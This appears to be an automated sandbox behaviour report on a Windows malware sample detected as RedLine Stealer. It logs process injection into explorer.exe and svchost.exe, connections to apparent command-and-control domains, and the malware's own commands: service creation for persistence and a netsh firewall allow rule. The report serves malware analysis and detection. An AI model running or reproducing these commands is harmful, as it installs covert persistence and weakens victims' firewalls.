                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00422C40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_0042CCB2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00419C55 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00422C40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_0042BDF0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00428660 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_0043AB50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: 3A7E.exe.5.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 7B0000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeMemory written: C:\Users\user\Desktop\OG9rNsihJ7.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsMemory written: C:\Users\user\AppData\Roaming\vfgiwcs base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeMemory written: C:\Users\user\AppData\Local\Temp\3BC6.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7B0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_005F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeThread created: C:\Windows\explorer.exe EIP: 3031930
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsThread created: unknown EIP: 6DC1930
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeThread created: unknown EIP: 7551930
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7B0000
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 997008
                      .NET source code references suspicious native API functionsShow sources
                      Source: 3BC6.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.0.3BC6.exe.650000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.0.3BC6.exe.650000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.2.3BC6.exe.650000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.0.3BC6.exe.650000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 30.0.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 45.0.3BC6.exe.3c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeProcess created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsProcess created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ffiawxs
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.256399873.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.282787344.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.290821286.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.273349889.00000000089FF000.00000004.00000001.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000005.00000000.249728645.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.262413005.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.278743896.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000005.00000000.263556016.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.249987972.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.279533280.0000000001640000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.344858130.0000000000C60000.00000002.00020000.sdmp, B1B2.exe, 00000014.00000000.349618118.0000000000C60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3BC6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00419EB2 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00419EB2 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Uses netsh to modify the Windows network and firewall settingsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Modifies the windows firewallShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000C.00000002.534608363.000001ECC9E3D000.00000004.00000001.sdmpBinary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000C.00000002.534822144.000001ECC9F02000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.534608363.000001ECC9E3D000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
